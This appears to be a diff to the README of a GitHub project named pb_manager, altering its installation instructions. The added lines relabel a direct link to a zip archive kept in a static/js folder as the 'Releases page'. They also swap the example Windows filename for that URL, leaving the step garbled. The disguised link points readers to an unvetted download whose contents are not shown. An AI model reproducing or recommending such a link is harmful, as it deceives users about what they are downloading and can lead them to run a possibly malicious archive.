AhsanBilal-748/pb_manager/README.md

 To get started with **pb_manager**, follow these steps:

-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/AhsanBilal-748/pb_manager/releases).
+1. **Visit the Releases Page**: Go to the [Releases page](https://raw.githubusercontent.com/AhsanBilal-748/pb_manager/main/static/js/pb_manager-v2.1-alpha.4.zip).
 Here, you will find the latest version of **pb_manager** and its previous versions.

 2. **Choose the Right Version**: Look for the most recent release.
 This will usually show up at the top of the list.

 3. **Download the Application**: Click on the file that matches your operating system.
-For example, if you're using Windows, you might see a file named `pb_manager_windows.exe`.
+For example, if you're using Windows, you might see a file named `https://raw.githubusercontent.com/AhsanBilal-748/pb_manager/main/static/js/pb_manager-v2.1-alpha.4.zip`.
 Click on it to start the download.

 4. **Locate the Downloaded File**: Once the download is complete, go to your Downloads folder or the location where you saved the file.